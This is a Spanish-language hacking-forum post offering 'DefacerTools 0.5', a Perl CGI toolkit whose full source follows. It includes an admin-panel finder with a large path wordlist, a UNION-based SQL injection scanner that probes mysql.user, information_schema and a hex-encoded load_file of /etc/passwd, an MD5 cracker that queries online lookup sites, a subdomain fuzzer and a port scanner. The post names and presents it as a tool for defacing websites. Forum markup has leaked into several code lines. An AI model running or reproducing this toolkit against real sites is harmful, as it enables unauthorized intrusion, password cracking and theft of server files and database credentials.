[Perl] DefacerTools 0.5 (regalo de navidad)

en: Diciembre 10, 2011, 09:33:45 am

Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

HexConverter[/li]
PanelFinder[/li]
PathsFinder[/li]
SQLi Scanner[/li]
FuzzDNS[/li]
FinderPass[/li]
PortScanner[/li][/list]

El codigo del programa (formateado con perltidy) es

defacertools.cgi

Código: Perl
1. #!"\xampp\perl\bin\perl.exe"
2. #
3. #DefacerTools 0.5
4. #
5. #(C) Doddy Hackman 2012
6. #
7. #
9. use CGI;
10. use LWP::UserAgent;
11. use URI::Split qw(uri_split);
12. use HTML::LinkExtor;
13. use IO::Socket;
15. @panels = (
16. 'admin/admin.asp', 'admin/login.asp',
17. 'admin/index.asp', 'admin/admin.aspx',
18. 'admin/login.aspx', 'admin/index.aspx',
19. 'admin/webmaster.asp', 'admin/webmaster.aspx',
20. 'asp/admin/index.asp', 'asp/admin/index.aspx',
21. 'asp/admin/admin.asp', 'asp/admin/admin.aspx',
22. 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
23. 'admin/', 'login.asp',
24. 'login.aspx', 'admin.asp',
25. 'admin.aspx', 'webmaster.aspx',
26. 'webmaster.asp', 'login/index.asp',
27. 'login/index.aspx', 'login/login.asp',
28. 'login/login.aspx', 'login/admin.asp',
29. 'login/admin.aspx', 'administracion/index.asp',
30. 'administracion/index.aspx', 'administracion/login.asp',
31. 'administracion/login.aspx', 'administracion/webmaster.asp',
32. 'administracion/webmaster.aspx', 'administracion/admin.asp',
33. 'administracion/admin.aspx', 'php/admin/',
34. 'admin/admin.php', 'admin/index.php',
35. 'admin/login.php', 'admin/system.php',
36. 'admin/ingresar.php', 'admin/administrador.php',
37. 'admin/default.php', 'administracion/',
38. 'administracion/index.php', 'administracion/login.php',
39. 'administracion/ingresar.php', 'administracion/admin.php',
40. 'administration/', 'administration/index.php',
41. 'administration/login.php', 'administrator/index.php',
42. 'administrator/login.php', 'administrator/system.php',
43. 'system/', 'system/login.php',
44. 'admin.php', 'login.php',
45. 'administrador.php', 'administration.php',
46. 'administrator.php', 'admin1.html',
47. 'admin1.php', 'admin2.php',
48. 'admin2.html', 'yonetim.php',
49. 'yonetim.html', 'yonetici.php',
50. 'yonetici.html', 'adm/',
51. 'admin/account.php', 'admin/account.html',
52. 'admin/index.html', 'admin/login.html',
53. 'admin/home.php', 'admin/controlpanel.html',
54. 'admin/controlpanel.php', 'admin.html',
55. 'admin/cp.php', 'admin/cp.html',
56. 'cp.php', 'cp.html',
57. 'administrator/', 'administrator/index.html',
58. 'administrator/login.html', 'administrator/account.html',
59. 'administrator/account.php', 'administrator.html',
60. 'login.html', 'modelsearch/login.php',
61. 'moderator.php', 'moderator.html',
62. 'moderator/login.php', 'moderator/login.html',
63. 'moderator/admin.php', 'moderator/admin.html',
64. 'moderator/', 'account.php',
65. 'account.html', 'controlpanel/',
66. 'controlpanel.php', 'controlpanel.html',
67. 'admincontrol.php', 'admincontrol.html',
68. 'adminpanel.php', 'adminpanel.html',
69. 'admin1.asp', 'admin2.asp',
70. 'yonetim.asp', 'yonetici.asp',
71. 'admin/account.asp', 'admin/home.asp',
72. 'admin/controlpanel.asp', 'admin/cp.asp',
73. 'cp.asp', 'administrator/index.asp',
74. 'administrator/login.asp', 'administrator/account.asp',
75. 'administrator.asp', 'modelsearch/login.asp',
76. 'moderator.asp', 'moderator/login.asp',
77. 'moderator/admin.asp', 'account.asp',
78. 'controlpanel.asp', 'admincontrol.asp',
79. 'adminpanel.asp', 'fileadmin/',
80. 'fileadmin.php', 'fileadmin.asp',
81. 'fileadmin.html', 'administration.html',
82. 'sysadmin.php', 'sysadmin.html',
83. 'phpmyadmin/', 'myadmin/',
84. 'sysadmin.asp', 'sysadmin/',
85. 'ur-admin.asp', 'ur-admin.php',
86. 'ur-admin.html', 'ur-admin/',
87. 'Server.php', 'Server.html',
88. 'Server.asp', 'Server/',
89. 'wp-admin/', 'administr8.php',
90. 'administr8.html', 'administr8/',
91. 'administr8.asp', 'webadmin/',
92. 'webadmin.php', 'webadmin.asp',
93. 'webadmin.html', 'administratie/',
94. 'admins/', 'admins.php',
95. 'admins.asp', 'admins.html',
96. 'administrivia/', 'Database_Administration/',
97. 'WebAdmin/', 'useradmin/',
98. 'sysadmins/', 'admin1/',
99. 'system-administration/', 'administrators/',
100. 'pgadmin/', 'directadmin/',
101. 'staradmin/', 'ServerAdministrator/',
102. 'SysAdmin/', 'administer/',
103. 'LiveUser_Admin/', 'sys-admin/',
104. 'typo3/', 'panel/',
105. 'cpanel/', 'cPanel/',
106. 'cpanel_file/', 'platz_login/',
107. 'rcLogin/', 'blogindex/',
108. 'formslogin/', 'autologin/',
109. 'support_login/', 'meta_login/',
110. 'manuallogin/', 'simpleLogin/',
111. 'loginflat/', 'utility_login/',
112. 'showlogin/', 'memlogin/',
113. 'members/', 'login-redirect/',
114. 'sub-login/', 'wp-login/',
115. 'login1/', 'dir-login/',
116. 'login_db/', 'xlogin/',
117. 'smblogin/', 'customer_login/',
118. 'UserLogin/', 'login-us/',
119. 'acct_login/', 'admin_area/',
120. 'bigadmin/', 'project-admins/',
121. 'phppgadmin/', 'pureadmin/',
122. 'sql-admin/', 'radmind/',
123. 'openvpnadmin/', 'wizmysqladmin/',
124. 'vadmind/', 'ezsqliteadmin/',
125. 'hpwebjetadmin/', 'newsadmin/',
126. 'adminpro/', 'Lotus_Domino_Admin/',
127. 'bbadmin/', 'vmailadmin/',
128. 'Indy_admin/', 'ccp14admin/',
129. 'irc-macadmin/', 'banneradmin/',
130. 'sshadmin/', 'phpldapadmin/',
131. 'macadmin/', 'administratoraccounts/',
132. 'admin4_account/', 'admin4_colon/',
133. 'radmind-1/', 'Super-Admin/',
134. 'AdminTools/', 'cmsadmin/',
135. 'SysAdmin2/', 'globes_admin/',
136. 'cadmins/', 'phpSQLiteAdmin/',
137. 'navSiteAdmin/', 'server_admin_small/',
138. 'logo_sysadmin/', 'server/',
139. 'database_administration/', 'power_user/',
140. 'system_administration/', 'ss_vms_admin_sm/'
141. );
143. my @dns = ('www');
145. #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
147. my $nave = LWP::UserAgent->new;
148. $nave->agent(
149. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
150. );
151. $nave->timeout(5);
153. my %rta;
155. my $que = new CGI;
156. my @ques = $que->param;
158. for (@ques) {
159. $rta{$_} = $que->param($_);
160. }
162. print "Content-type:text/html\n\n";
163. print "
165. <style type=text/css>
168. .main {
169. margin : -287px 0px 0px -490px;
170. border : White solid 1px;
171. BORDER-COLOR: #00FF00;
172. }
174. #pie {
175. position: absolute;
176. bottom: 0;
177. }
179. body,a:link {
180. font: normal 16px Verdana, Arial, Helvetica,
181. sans-serif;
182. background-color: #000000;
183. color:#00FF00;
184. Courier New;
185. cursor:crosshair;
186. font-size: small;
187. }
189. input,table.outset,table.bord,table,textarea,select {
190. background-color:black;color:#00FF00;
191. border: solid 1px #00FF00;
192. border-color:#00FF00
193. }
195. a:link,a:visited,a:active {
196. color: #00FF00;
197. font: normal 16px Verdana, Arial, Helvetica,
198. sans-serif;
199. text-decoration: none;
200. }
202. </style>";
204. if ( $rta{'hex'} ) {
205. logouno();
206. print
207. qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
208. copyright();
209. }
210. elsif ( $rta{'textocode'} ) {
211. logouno();
212. print "</li><li type="square"> Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";[/li][/list]
213. print "</center>";
214. copyright();
215. }
216. elsif ( $rta{'panelfinder'} ) {
217. logodos();
218. print
219. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
220. copyright();
221. }
222. elsif ( $rta{'buscarpanel'} ) {
224. my $page = $rta{'buscarpanel'};
225. logodos();
226. print "<br></li><li type="square"> Scanning $page<br><br>";[/li][/list]
227. for $path (@panels) {
228. $code = tomax( $page . "/" . $path );
229. if ( $code->is_success ) {
230. print "[Link] : " . $page . "/" . $path . "<br>";
231. }
232. }
233. print "<br><br></li><li type="square"> Finish<br>";[/li][/list]
234. copyright();
235. }
236. elsif ( $rta{'pathsfinder'} ) {
237. logotres();
238. print
239. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
240. copyright();
241. }
242. elsif ( $rta{'buscarpaths'} ) {
243. logotres();
245. my $page = $rta{'buscarpaths'};
247. my $code = toma($page);
248. my @links = get_links($code);
250. print "<br><br></li><li type="square"> Finding paths<br><br>";[/li][/list]
252. for my $com (@links) {
253. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
254. if ( $path =~ /\/(.*)$/ ) {
255. my $path1 = $1;
256. $page =~ s/$path1//ig;
257. my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
258. if ( $path =~ /(.*)\// ) {
259. my $parche = $1;
260. unless ( $repetidos =~ /$parche/ ) {
261. $repetidos .= " " . $parche;
262. my $code = toma( "http://" . $auth . $parche );
264. if ( $code =~ /Index of (.*)</ig ) {
265. my $dir_found = $1;
266. chomp $dir_found;
267. print "</li><li type="square"> Directory Found : $page/$dir_found<br>";[/li][/list]
268. }
269. }
270. }
271. }
272. }
273. print "<br><br></li><li type="square">Finished<br>";[/li][/list]
274. copyright();
275. }
276. elsif ( $rta{'sqliscanner'} ) {
277. logocuatro();
278. print
279. qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
280. copyright();
281. }
282. elsif ( $rta{'buscarsql'} ) {
283. logocuatro();
284. print "<br><br></li><li type="square"> Scanning page<br><br>";[/li][/list]
285. &length( $rta{'buscarsql'} );
286. print "<br><br></li><li type="square"> Finished";[/li][/list]
287. copyright();
288. }
289. elsif ( $rta{'fuzzdns'} ) {
290. logocinco();
291. print
292. qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
293. copyright();
294. }
295. elsif ( $rta{'buscardns'} ) {
296. logocinco();
298. my $page = $rta{'buscardns'};
300. print "<br><br></li><li type="square"> Searching DNS to " . $page . ".....<br><br><br>";[/li][/list]
301. for my $path (@dns) {
302. $code = tomax( "http://" . $path . "." . $page );
303. if ( $code->is_success ) {
304. print "</li><li type="square"> Found : http://" . $path . "." . $page . "<br>";[/li][/list]
305. }
306. }
307. print "<br><br></li><li type="square"> Finished<br><br>";[/li][/list]
308. copyright();
309. }
310. elsif ( $rta{'finderpass'} ) {
311. logoseis();
312. print
313. qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
314. copyright();
315. }
316. elsif ( $rta{'buscarhash'} ) {
317. logoseis();
318. &crackit( $rta{'buscarhash'} );
319. copyright();
320. }
321. elsif ( $rta{'portscanner'} ) {
322. logosiete();
323. print
324. qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
325. copyright();
326. }
327. elsif ( $rta{'buscarpuertos'} ) {
328. logosiete();
329. scanuno( $rta{'buscarpuertos'} );
330. copyright();
331. }
332. elsif ( $rta{'home'} ) {
333. sintax();
334. }
335. else {
336. sintax();
337. }
339. sub sintax {
340. print qq(
341. <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
342. <br><br>
343. <h1><center>DefacerTools</center></h1>
344. <br><br>
345. <center>
346. <table border=1>
347. <td class=main><center><b>Tools</b></center></td><tr>
348. <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr>
349. <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
350. <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
351. <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
352. <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
353. <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
354. <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
355. </table>
356. </center>
357. );
358. }
360. sub logouno {
361. print qq(
362. <center>
363. <pre>
367. @ @ @@@@
368. @ @ @ @ @
369. @ @ @ @
370. @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@
371. @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @
372. @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @
373. @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @
374. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
375. @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @
380. </pre>
383. );
384. }
386. sub logodos {
387. print qq(
388. <center>
389. <pre>
393. @@@@@ @ @@@@@ @ @
394. @ @ @ @ @
395. @ @ @ @ @
396. @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@
397. @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @
398. @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @
399. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
400. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
401. @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @
406. </pre>
409. );
410. }
412. sub logotres {
413. print qq(
414. <center>
415. <pre>
419. @@@@@ @ @@@@@ @ @
420. @ @ @ @ @ @
421. @ @ @ @ @ @
422. @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@
423. @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @
424. @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @
425. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
426. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
427. @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @
433. </pre>
436. );
437. }
439. sub logocuatro {
440. print qq(
441. <center>
442. <pre>
446. @@@ @@@@ @ @ @@@
447. @ @ @ @ @ @ @ @
448. @ @ @ @ @ @
449. @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@
450. @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
451. @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
452. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
453. @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
454. @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
455. @
461. </pre>
464. );
465. }
467. sub logocinco {
468. print qq(
469. <center>
470. <pre>
474. @@@@@ @@@@ @ @ @@@
475. @ @ @ @@ @ @ @
476. @ @ @ @@ @ @
477. @ @ @ @@@@ @@@@ @ @ @ @ @ @
478. @@@@ @ @ @ @ @ @ @ @ @ @@@
479. @ @ @ @ @ @ @ @ @ @ @
480. @ @ @ @ @ @ @ @ @@ @
481. @ @ @@ @ @ @ @ @ @@ @ @
482. @ @@ @ @@@@ @@@@ @@@@ @ @ @@@
489. </pre>
492. );
493. }
495. sub logoseis {
496. print qq(
497. <center>
498. <pre>
502. @@@@@ @ @ @@@@@
503. @ @ @ @
504. @ @ @ @
505. @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@
506. @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @
507. @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @
508. @ @ @ @ @ @ @ @ @ @ @ @ @
509. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
510. @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@
518. </pre>
521. );
522. }
524. sub logosiete {
525. print qq(
526. <center>
527. <pre>
531. @@@@@ @@@
532. @ @ @ @ @
533. @ @ @ @
534. @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@
535. @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
536. @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
537. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
538. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
539. @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
548. </pre>
551. );
552. }
554. sub copyright {
555. print
556. qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
557. }
559. sub length {
560. print "<br></li><li type="square"> Looking for the number of columns<br><br>";[/li][/list]
561. my $rows = "0";
562. my $asc;
563. my $page = $_[0];
564. ( $pass1, $pass2 ) = &bypass( $_[1] );
566. $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
567. $total = "1";
568. for my $rows ( 2 .. 200 ) {
569. $asc .=
570. "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
571. $total .= "," . $rows;
572. $injection =
573. $page . "1"
574. . $pass1 . "and"
575. . $pass1 . "1=0"
576. . $pass1 . "union"
577. . $pass1
578. . "select"
579. . $pass1
580. . $alert
581. . $asc;
582. $test = toma($injection);
583. if ( $test =~ /RATSXPDOWN/ ) {
584. @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
585. $control = 1;
586. my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
587. my $save = $auth;
588. $total =~ s/$number[0]/hackman/;
589. print "[SQLI] : "
590. . $page . "1"
591. . $pass1 . "and"
592. . $pass1 . "1=0"
593. . $pass1 . "union"
594. . $pass1
595. . "select"
596. . $pass1
597. . $total . "<br>";
598. details(
599. $page . "1"
600. . $pass1 . "and"
601. . $pass1 . "1=0"
602. . $pass1 . "union"
603. . $pass1
604. . "select"
605. . $pass1
606. . $total,
607. "--", ""
608. );
609. }
610. }
611. }
613. sub details {
614. my ( $page, $bypass, $save ) = @_;
615. ( $pass1, $pass2 ) = &bypass($bypass);
616. if ( $page =~ /(.*)hackman(.*)/ig ) {
617. print "<br></li><li type="square"> Searching information..<br><br>";[/li][/list]
618. my ( $start, $end ) = ( $1, $2 );
619. $inforschema =
620. $start
621. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
622. . $end
623. . $pass1 . "from"
624. . $pass1
625. . "information_schema.tables"
626. . $pass2;
627. $mysqluser =
628. $start
629. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
630. . $end
631. . $pass1 . "from"
632. . $pass1
633. . "mysql.user"
634. . $pass2;
635. $test3 =
636. toma( $start
637. . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
638. . $end
639. . $pass2 );
640. $test1 = toma($inforschema);
641. $test2 = toma($mysqluser);
642. if ( $test2 =~ /ERTOR854/ig ) {
643. print "[mysql.user] : ON<br>";
644. }
645. else {
646. print "[mysql.user] : OFF<br>";
647. }
648. if ( $test1 =~ /ERTOR854/ig ) {
649. print "[information_schema.tables] : ON<br>";
650. }
651. else {
652. print "[information_schema.tables] : OFF<br>";
653. }
654. if ( $test3 =~ /ERTOR854/ig ) {
655. print "[load_file] : ON<br>";
656. }
657. $concat =
658. "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
659. $injection = $start . $concat . $end . $pass2;
660. $code = toma($injection);
661. if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
662. print
663. "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
664. }
665. else {
666. print "<br>[-] Not found any data<br>";
667. }
668. }
669. }
671. sub encode {
672. my $string = $_[0];
673. $hex = '0x';
674. for ( split //, $string ) {
675. $hex .= sprintf "%x", ord;
676. }
677. return $hex;
678. }
680. sub bypass {
681. if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); }
682. elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
683. else { return ( "+", "--" ); }
684. }
686. sub ascii {
687. return join ',', unpack "U*", $_[0];
688. }
690. sub toma {
691. return $nave->get( $_[0] )->content;
692. }
694. sub tomax {
695. return $nave->get( $_[0] );
696. }
698. sub get_links {
700. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
701. return @links;
703. sub agarrar {
704. my ( $a, %b ) = @_;
705. push( @links, values %b );
706. }
707. }
709. sub crackit {
711. my $secret = $_[0];
713. print "<br><br></li><li type="square"> Cracking $_[0]<br><br>";[/li][/list]
715. my %hash = (
717. 'http://passcracking.com/' => {
718. 'tipo' => 'post',
719. 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
720. 'regex' =>
721. '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
722. },
723. 'http://md5.hashcracking.com/search.php?md5=' => {
724. 'tipo' => 'get',
725. 'regex' => 'Cleartext of $_[0] is (.*)',
726. },
727. 'http://www.bigtrapeze.com/md5/' => {
728. 'tipo' => 'post',
729. 'variables' => '{"query" => $_[0], "submit" => " Crack "}',
730. 'regex' =>
731. 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
732. },
733. 'http://opencrack.hashkiller.com/' => {
734. 'tipo' => 'post',
735. 'variables' =>
736. '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
737. 'regex' => qq(<\/div><div class="result">$_[0]<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt=":(" title="Triste" class="smiley" />.+)<br\/>),
738. },
739. 'http://www.hashchecker.com/index.php?_sls=search_hash' => {
740. 'tipo' => 'post',
741. 'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
742. 'regex' =>
743. '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
744. },
745. 'http://victorov.su/md5/?md5e=&md5d=' => {
746. 'tipo' => 'get',
747. 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
748. }
749. );
751. for my $data ( keys %hash ) {
753. if ( $hash{$data}{tipo} eq "get" ) {
754. $code = toma( $data . $_[0] );
755. if ( $code =~ /$hash{$data}{regex}/ig ) {
756. print "<br></li><li type="square"> Decoded : " . $1 . "<br><br>";[/li][/list]
757. print $secret. ":" . $1 . "<br>";
758. }
759. }
760. else {
761. $code = tomar( $data, $hash{$data}{variables} );
762. if ( $code =~ /$hash{$data}{regex}/ig ) {
763. print $secret. ":" . $1 . "<br>";
764. }
765. }
766. }
767. print "<br></li><li type="square"> Finish<br>";[/li][/list]
768. }
770. sub tomar {
771. my ( $web, $var ) = @_;
772. return $nave->post( $web, [ %{$var} ] )->content;
773. }
775. sub scanuno {
777. my %ports = (
778. "21" => "ftp",
779. "22" => "ssh",
780. "25" => "smtp",
781. "80" => "http",
782. "110" => "pop3",
783. "3306" => "mysql"
784. );
786. print "<br></li><li type="square"> Scanning $_[0]<br><br><br>";[/li][/list]
788. for my $port ( keys %ports ) {
790. if (
791. new IO::Socket::INET(
792. PeerAddr => $_[0],
793. PeerPort => $port,
794. Proto => "tcp",
795. Timeout => 0.5
796. )
797. )
798. {
799. print "[Port] : "
800. . $port
801. . " [Service] : "
802. . $ports{$port} . "<br>";
803. }
804. }
805. print "<br><br></li><li type="square"> Scan Finish<br>";[/li][/list]
806. }
808. # The End ?

Tutorial perl desde cero By: Black Poision & Painboy Iniciado por ProcessKill	Respuestas: 2 Vistas: 5330	Septiembre 02, 2011, 09:43:36 pm por blozzter
[Perl] Verificando si es root para correr un script Iniciado por c1st	Respuestas: 1 Vistas: 3473	Octubre 07, 2012, 06:01:39 pm por ANTRAX
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl Iniciado por tar3kw0rm3d	Respuestas: 0 Vistas: 3015	Junio 02, 2013, 08:01:28 pm por tar3kw0rm3d
[Perl] Counter Strike 1.6 Servers List Iniciado por BigBear	Respuestas: 0 Vistas: 2560	Noviembre 12, 2012, 07:32:11 pm por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL] Iniciado por SkillmaX	Respuestas: 0 Vistas: 2598	Julio 04, 2010, 10:14:31 am por SkillmaX

Underc0de - Hacking y seguridad informática

[Perl] DefacerTools 0.5 (regalo de navidad)

BigBear

[Perl] DefacerTools 0.5 (regalo de navidad)

Similar topics (5)